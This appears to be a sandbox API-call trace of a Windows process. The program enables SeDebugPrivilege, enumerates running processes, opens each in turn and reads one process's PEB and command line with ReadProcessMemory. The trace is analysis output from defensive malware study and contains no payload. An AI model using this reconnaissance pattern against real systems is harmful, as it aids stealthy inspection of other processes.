start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3684
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Thread:
id = 124
os_tid = 0xa34
[0401.878] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0401.905] SetLastError (dwErrCode=0x0)
[0401.905] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12de390 | out: pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12de390) returned 1
[0401.906] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x8) returned 0x15da80
[0401.906] SetLastError (dwErrCode=0x0)
[0401.906] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x15da80, pcchLanguagesBuffer=0x12de390 | out: pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x15da80, pcchLanguagesBuffer=0x12de390) returned 1
[0401.906] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x8) returned 0x15da90
[0401.906] HeapFree (in: hHeap=0x120000, dwFlags=0x0, lpMem=0x15da80 | out: hHeap=0x120000) returned 1
[0401.906] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x20) returned 0x1a58a0
[0401.906] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x1a58a0, pulNumLanguages=0x12de488 | out: pulNumLanguages=0x12de488) returned 1
[0401.907] HeapFree (in: hHeap=0x120000, dwFlags=0x0, lpMem=0x1a58a0 | out: hHeap=0x120000) returned 1
[0401.922] SafeArrayGetElemsize (psa=0x1b06d0) returned 0x8
[0401.923] SafeArrayPutElement (psa=0x1b06d0, rgIndices=0x12ddcc0, pv=0x1a5878) returned 0x0
[0401.923] SafeArrayRedim (in: psa=0x1b06d0, psaboundNew=0x12ddcd8 | out: psa=0x1b06d0) returned 0x0
[0401.923] SafeArrayCopy (in: psa=0x1b06d0, ppsaOut=0x12ddc20 | out: ppsaOut=0x12ddc20) returned 0x0
[0401.925] malloc (_Size=0xb0) returned 0x2c3750
[0401.925] LoadLibraryW (lpLibFileName="NTDLL.DLL") returned 0x77880000
[0401.926] GetProcAddress (hModule=0x77880000, lpProcName="RtlInitUnicodeString") returned 0x778d5280
[0401.926] GetProcAddress (hModule=0x77880000, lpProcName="RtlFreeUnicodeString") returned 0x778d5610
[0401.926] GetProcAddress (hModule=0x77880000, lpProcName="NtSetSystemEnvironmentValue") returned 0x778d29e0
[0401.926] GetProcAddress (hModule=0x77880000, lpProcName="NtQuerySystemEnvironmentValue") returned 0x778d25e0
[0401.926] GetProcAddress (hModule=0x77880000, lpProcName="NtCreateFile") returned 0x778d1860
[0401.926] GetProcAddress (hModule=0x77880000, lpProcName="NtQuerySystemInformation") returned 0x778d1670
[0401.927] GetProcAddress (hModule=0x77880000, lpProcName="NtQueryDirectoryObject") returned 0x778d2440
[0401.927] GetProcAddress (hModule=0x77880000, lpProcName="NtQueryObject") returned 0x778d1410
[0401.927] GetProcAddress (hModule=0x77880000, lpProcName="NtOpenDirectoryObject") returned 0x778d1890
[0401.927] GetProcAddress (hModule=0x77880000, lpProcName="NtQueryInformationProcess") returned 0x778d14a0
[0401.927] GetProcAddress (hModule=0x77880000, lpProcName="NtQueryInformationToken") returned 0x778d1520
[0401.927] GetProcAddress (hModule=0x77880000, lpProcName="NtOpenFile") returned 0x778d1640
[0401.928] GetProcAddress (hModule=0x77880000, lpProcName="NtClose") returned 0x778d1400
[0401.928] GetProcAddress (hModule=0x77880000, lpProcName="NtFsControlFile") returned 0x778d16a0
[0401.928] GetProcAddress (hModule=0x77880000, lpProcName="NtQueryVolumeInformationFile") returned 0x778d17a0
[0401.928] malloc (_Size=0x18) returned 0x2bf020
[0401.928] GetCurrentThread () returned 0xfffffffffffffffe
[0401.928] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x28, OpenAsSelf=1, TokenHandle=0x12dda78 | out: TokenHandle=0x12dda78*=0x240) returned 1
[0401.928] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12dda54 | out: lpLuid=0x12dda54*(LowPart=0x14, HighPart=0)) returned 1
[0401.930] SetLastError (dwErrCode=0x0)
[0401.931] AdjustTokenPrivileges (in: TokenHandle=0x240, DisableAllPrivileges=0, NewState=0x12dda50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0401.931] GetLastError () returned 0x514
[0401.931] CloseHandle (hObject=0x240) returned 1
[0401.931] malloc (_Size=0x18) returned 0x2beee0
[0401.931] SafeArrayPutElement (psa=0x1b00d0, rgIndices=0x12ddaf8, pv=0x1b0688) returned 0x0
[0401.931] SafeArrayPutElement (psa=0x1b0850, rgIndices=0x12ddaf8, pv=0x1b0688) returned 0x0
[0401.932] free (_Block=0x2beee0)
[0401.932] malloc (_Size=0x8000) returned 0x2c9a30
[0401.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2c9a30, Length=0x8000, ResultLength=0x0 | out: SystemInformation=0x2c9a30, ResultLength=0x0) returned 0xc0000004
[0401.933] free (_Block=0x2c9a30)
[0401.933] malloc (_Size=0x10000) returned 0x2c9a30
[0401.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2c9a30, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2c9a30, ResultLength=0x0) returned 0xc0000004
[0401.933] free (_Block=0x2c9a30)
[0401.933] malloc (_Size=0x18000) returned 0x2c9a30
[0401.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2c9a30, Length=0x18000, ResultLength=0x0 | out: SystemInformation=0x2c9a30, ResultLength=0x0) returned 0x0
[0401.936] _ui64tow (_Value=0x0, _Buffer="", _Radix=10) returned="0"
[0401.941] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="0") returned 1
[0401.942] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x120000, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0401.942] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0401.957] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0
[0401.958] CloseHandle (hObject=0x0) returned 0
[0401.959] _ui64tow (_Value=0x4, _Buffer="0", _Radix=10) returned="4"
[0401.963] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="4") returned 1
[0401.965] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x120000, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Se䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0401.965] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0401.991] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0
[0401.991] CloseHandle (hObject=0x0) returned 0
[0401.992] _ui64tow (_Value=0x10c, _Buffer="4", _Radix=10) returned="268"
[0401.996] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="268") returned 3
[0401.997] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0401.997] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.022] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x0
[0402.022] CloseHandle (hObject=0x0) returned 0
[0402.047] _ui64tow (_Value=0x154, _Buffer="268", _Radix=10) returned="340"
[0402.054] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="340") returned 3
[0402.056] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.056] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.084] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x154) returned 0x0
[0402.085] CloseHandle (hObject=0x0) returned 0
[0402.086] _ui64tow (_Value=0x178, _Buffer="340", _Radix=10) returned="376"
[0402.090] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="376") returned 3
[0402.092] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243a4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.092] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.114] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0
[0402.114] CloseHandle (hObject=0x0) returned 0
[0402.115] _ui64tow (_Value=0x184, _Buffer="376", _Radix=10) returned="388"
[0402.123] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="388") returned 3
[0402.124] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.124] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.146] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0
[0402.146] CloseHandle (hObject=0x0) returned 0
[0402.147] _ui64tow (_Value=0x1ac, _Buffer="388", _Radix=10) returned="428"
[0402.152] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="428") returned 3
[0402.153] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243a4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.153] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.173] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0
[0402.173] CloseHandle (hObject=0x0) returned 0
[0402.174] _ui64tow (_Value=0x1d8, _Buffer="428", _Radix=10) returned="472"
[0402.181] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="472") returned 3
[0402.182] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.183] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.207] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0
[0402.207] CloseHandle (hObject=0x0) returned 0
[0402.208] _ui64tow (_Value=0x1e0, _Buffer="472", _Radix=10) returned="480"
[0402.215] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="480") returned 3
[0402.216] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.216] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.240] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0
[0402.240] CloseHandle (hObject=0x0) returned 0
[0402.241] _ui64tow (_Value=0x1e8, _Buffer="480", _Radix=10) returned="488"
[0402.247] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="488") returned 3
[0402.248] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.248] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.292] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0
[0402.292] CloseHandle (hObject=0x0) returned 0
[0402.293] _ui64tow (_Value=0x254, _Buffer="488", _Radix=10) returned="596"
[0402.298] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="596") returned 3
[0402.299] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.299] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.333] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x254) returned 0x0
[0402.333] CloseHandle (hObject=0x0) returned 0
[0402.335] _ui64tow (_Value=0x298, _Buffer="596", _Radix=10) returned="664"
[0402.340] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="664") returned 3
[0402.342] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.342] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.369] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x298) returned 0x0
[0402.369] CloseHandle (hObject=0x0) returned 0
[0402.370] _ui64tow (_Value=0x2c8, _Buffer="664", _Radix=10) returned="712"
[0402.374] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="712") returned 3
[0402.376] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.376] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.401] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0
[0402.401] CloseHandle (hObject=0x0) returned 0
[0402.402] _ui64tow (_Value=0x338, _Buffer="712", _Radix=10) returned="824"
[0402.406] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="824") returned 3
[0402.408] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.408] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.436] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0
[0402.436] CloseHandle (hObject=0x0) returned 0
[0402.437] _ui64tow (_Value=0x36c, _Buffer="824", _Radix=10) returned="876"
[0402.447] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="876") returned 3
[0402.448] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.448] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.475] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x0
[0402.475] CloseHandle (hObject=0x0) returned 0
[0402.476] _ui64tow (_Value=0x3fc, _Buffer="876", _Radix=10) returned="1020"
[0402.481] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1020") returned 4
[0402.482] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.482] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.506] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3fc) returned 0x0
[0402.506] CloseHandle (hObject=0x0) returned 0
[0402.507] _ui64tow (_Value=0x3d0, _Buffer="1020", _Radix=10) returned="976"
[0402.512] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="976") returned 3
[0402.514] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.514] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.535] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3d0) returned 0x240
[0402.535] GetLastError () returned 0x0
[0402.535] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0402.535] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdb018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.535] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0402.536] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3327f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.536] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x332688, lpBuffer=0x12dd100, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0402.537] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0402.538] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0402.538] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdb020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.538] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x331e60, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0402.538] malloc (_Size=0x3e) returned 0x2bd2c0
[0402.538] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3326c0, lpBuffer=0x2bd2c0, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2bd2c0*, lpNumberOfBytesRead=0x0) returned 1
[0402.539] free (_Block=0x2bd2c0)
[0402.539] CloseHandle (hObject=0x240) returned 1
[0402.540] _ui64tow (_Value=0x410, _Buffer="976", _Radix=10) returned="1040"
[0402.545] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1040") returned 4
[0402.546] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.546] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.574] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x410) returned 0x0
[0402.574] CloseHandle (hObject=0x0) returned 0
[0402.575] _ui64tow (_Value=0x470, _Buffer="1040", _Radix=10) returned="1136"
[0402.580] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1136") returned 4
[0402.581] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0402.581] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0402.612] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x470) returned 0x0
[0402.612] CloseHandle (hObject=0x0) returned 0
[0402.613] _ui64tow (_Value=0x490, _Buffer="1136", _Radix=10) returned="1168"
[0402.618] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1168") returned 4
